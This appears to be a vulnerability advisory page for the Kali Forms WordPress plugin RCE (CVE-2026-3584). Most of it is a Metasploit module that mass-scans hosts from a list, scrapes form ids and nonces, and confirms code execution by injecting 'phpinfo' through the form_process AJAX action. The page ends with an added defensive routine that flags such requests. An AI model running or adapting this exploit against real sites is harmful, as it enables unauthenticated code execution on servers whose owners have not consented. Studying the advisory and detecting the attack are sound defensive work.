WordPress Kali Forms 2.4.9 Remote Code Execution

Published: 20 Apr 2026 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news
Views: 77

WordPress Kali Forms 2.4.9 RCE assessment module for auditing sites and detecting remote code execution.

Related

Family | Title | Published
ATTACKERKB | CVE-2026-3584 | 20 Mar 2026 21:25
Circl | CVE-2026-3584 | 20 Mar 2026 22:17
CNNVD | WordPress plugin Kali Forms code injection vulnerability | 20 Mar 2026 00:00
CVE | CVE-2026-3584 | 20 Mar 2026 21:25
Cvelist | CVE-2026-3584 Kali Forms <= 2.4.9 - Unauthenticated Remote Code Execution via form_process | 20 Mar 2026 21:25
EUVD | EUVD-2026-13814 | 21 Mar 2026 00:31
GithubExploit | Exploit for CVE-2026-3584 | 25 Mar 2026 09:21
Nuclei | WordPress Kali Forms <= 2.4.9 - Remote Code Execution | 3 Jun 2026 06:04
NVD | CVE-2026-3584 | 20 Mar 2026 22:16
Patchstack | WordPress Kali Forms plugin <= 2.4.9 - Unauthenticated Remote Code Execution via form_process vulnerability | 23 Mar 2026 10:14
==================================================================================================================================
    | # Title     : WordPress Kali Forms 2.4.9 Remote Code Execution Assessment                                                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://fr.wordpress.org/plugins/kali-forms/                                                                     |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module is designed for security auditing of WordPress sites using the Kali Forms plugin, focusing on detecting potential exposure to a Remote Code Execution (RCE) condition.
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    ##
    
    require 'json'
    require 'uri'
    require 'fileutils'
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Scanner
      include Msf::Auxiliary::Report
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'WordPress Kali Forms 2.4.9 Remote Code Execution Assessment',
            'Description' => %q{
              Audits WordPress sites using the Kali Forms plugin for exposure to
              the form_process remote code execution condition (CVE-2026-3584).
              SAFE_AUDIT only fingerprints the plugin from the front page; the
              other levels send a test request through admin-ajax.php.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2026-3584']
            ]
          )
        )
    
        register_options([
          OptInt.new('THREADS', [true, 'Concurrent targets', 10]),
          OptPath.new('TARGETS_FILE', [true, 'List of target hosts']),
          OptInt.new('TIMEOUT', [true, 'HTTP timeout', 15]),
          OptString.new('EXPLOIT_LEVEL', [true, 'SAFE_AUDIT / RCE_ONLY / FULL', 'SAFE_AUDIT'])
        ])
      end
    
      def setup
        @lock = Mutex.new
        @stats = { scanned: 0, vulnerable: 0, failed: 0 }
    
        @loot_dir = File.join(Msf::Config.loot_directory, "kali_forms_#{Time.now.to_i}")
        FileUtils.mkdir_p(@loot_dir)
      end
    
      # Accept "host", "host:port" or a full URL and return a parsed URI with scheme,
      # port and a non-empty path, or nil when the line cannot be parsed.
      def normalize_target_uri(target)
        return nil if target.nil? || target.empty?
    
        uri = URI.parse(target =~ /^https?:\/\// ? target : "http://#{target}")
        uri.path = '/' if uri.path.nil? || uri.path.empty?
        uri
      rescue URI::InvalidURIError
        nil
      end
    
      # Connection parameters for send_request_cgi taken from the target URI rather than
      # from RHOST, so each line of TARGETS_FILE is contacted on its own host/port/scheme.
      def http_opts(uri, path, extra = {})
        {
          'rhost' => uri.host,
          'rport' => uri.port,
          'SSL' => uri.scheme == 'https',
          'vhost' => uri.host,
          'uri' => normalize_uri(uri.path, path)
        }.merge(extra)
      end
    
      def update_stats(key)
        @lock.synchronize { @stats[key] += 1 }
      end
    
      def run
        targets = File.readlines(datastore['TARGETS_FILE'])
                      .map(&:strip)
                      .reject { |l| l.empty? || l.start_with?('#') }
    
        queue = Queue.new
        targets.each { |t| queue << t }
    
        print_status("Starting scan on #{targets.length} targets")
    
        datastore['THREADS'].times.map do
          framework.threads.spawn("kali-scanner", false) do
            loop do
              begin
                target = queue.pop(true)
              rescue ThreadError
                break
              end
    
              scan_target(target)
            end
          end
        end.each(&:join)
    
        print_status("Done. Scanned=#{@stats[:scanned]} Vulnerable=#{@stats[:vulnerable]} Failed=#{@stats[:failed]}")
      end
    
      def scan_target(target)
        update_stats(:scanned)
    
        uri = normalize_target_uri(target)
        return unless uri
    
        # Fingerprint the plugin from the front page before doing anything else.
        # The HTTP timeout is the second argument of send_request_cgi, not an opts key.
        res = send_request_cgi(http_opts(uri, '/', 'method' => 'GET'), datastore['TIMEOUT'])
    
        unless res&.code == 200
          update_stats(:failed)
          return
        end
    
        return unless res.body =~ /kaliforms|KaliFormsObject/i
    
        print_good("Potential target: #{target}")
        return if datastore['EXPLOIT_LEVEL'] == 'SAFE_AUDIT'
    
        # Form ids and the AJAX nonce are read from the page the plugin renders.
        form_ids = res.body.scan(/data-id=["'](\d+)["']/i).flatten.uniq
        nonce = res.body[/ajax_nonce["']\s*:\s*["']([a-f0-9]+)["']/i, 1]
    
        return if form_ids.empty? || nonce.nil?
    
        form_ids.each do |fid|
          next unless test_rce(uri, fid, nonce)
    
          update_stats(:vulnerable)
          print_good("Vulnerable: #{target} FormID=#{fid}")
    
          report_vuln(
            host: uri.host,
            port: uri.port,
            proto: 'tcp',
            name: 'Kali Forms RCE',
            refs: ['CVE-2026-3584'],
            info: "Form ID #{fid}"
          )
        end
      rescue => e
        update_stats(:failed)
        vprint_error("#{target} => #{e.message}")
      end
    
      # Sends the form_process request with a test value in thisPermalink and
      # treats phpinfo() output in the reply as confirmation.
      def test_rce(uri, fid, nonce)
        res = send_request_cgi(
          http_opts(uri, '/wp-admin/admin-ajax.php',
            'method' => 'POST',
            'vars_post' => {
              'action' => 'kaliforms_form_process',
              'data[formId]' => fid,
              'data[nonce]' => nonce,
              'data[thisPermalink]' => 'phpinfo'
            }),
          datastore['TIMEOUT']
        )
    
        res&.body&.include?('PHP Version')
      rescue
        false
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
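As an added example (not part of the packetstorm advisory or of the Kali Forms plugin), a small Ruby request-inspection routine that flags the request shape the module above sends: a POST to admin-ajax.php with action=kaliforms_form_process whose data[thisPermalink] is not URL-shaped. It assumes that a legitimate submission carries the page URL in that field (an assumption, not something the advisory states) and that a proxy or WAF hook can hand it the decoded POST body; the sample traffic is constructed.

```ruby
require 'cgi'
require 'uri'

# Parse an application/x-www-form-urlencoded body into a flat Hash.
# CGI.parse returns an array per key; keep the first value of each.
def parse_form_body(body)
  CGI.parse(body).transform_values(&:first)
end

# A permalink as WordPress emits it: an absolute http(s) URL or a site-relative path.
# Assumption (not from the advisory): benign submissions never send a bare word here.
def permalink_shaped?(value)
  return false if value.nil? || value.empty?
  return true if value.start_with?('/')
  uri = URI.parse(value)
  %w[http https].include?(uri.scheme) && !uri.host.nil?
rescue URI::InvalidURIError
  false
end

# Classify one request: :kaliforms_suspicious, :kaliforms_benign or :ignore.
def classify_request(method, path, body)
  return :ignore unless method == 'POST' && path.end_with?('/wp-admin/admin-ajax.php')
  params = parse_form_body(body.to_s)
  return :ignore unless params['action'] == 'kaliforms_form_process'
  permalink_shaped?(params['data[thisPermalink]']) ? :kaliforms_benign : :kaliforms_suspicious
end

# Run the classifier over [method, path, body] tuples and return only the hits.
def suspicious_requests(requests)
  requests.select { |m, p, b| classify_request(m, p, b) == :kaliforms_suspicious }
end

# Constructed sample traffic (not captured from any real site).
SAMPLE_REQUESTS = [
  ['POST', '/wp-admin/admin-ajax.php',
   'action=kaliforms_form_process&data%5BformId%5D=3&data%5Bnonce%5D=ab12cd34&data%5BthisPermalink%5D=https%3A%2F%2Fexample.test%2Fcontact%2F'],
  ['POST', '/wp-admin/admin-ajax.php',
   'action=kaliforms_form_process&data%5BformId%5D=3&data%5Bnonce%5D=ab12cd34&data%5BthisPermalink%5D=phpinfo'],
  ['POST', '/wp-admin/admin-ajax.php', 'action=heartbeat'],
  ['GET', '/contact/', nil]
].freeze

if __FILE__ == $PROGRAM_NAME
  suspicious_requests(SAMPLE_REQUESTS).each { |m, p, b| puts "ALERT #{m} #{p} #{b}" }
end
```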


Published: 20 Apr 2026 00:00 (current)
Risk: 6.5 (Medium)
Vulners AI Score: 6.5
CVSS 3.1: 9.8
EPSS: 0.28725
SSVC
Views: 77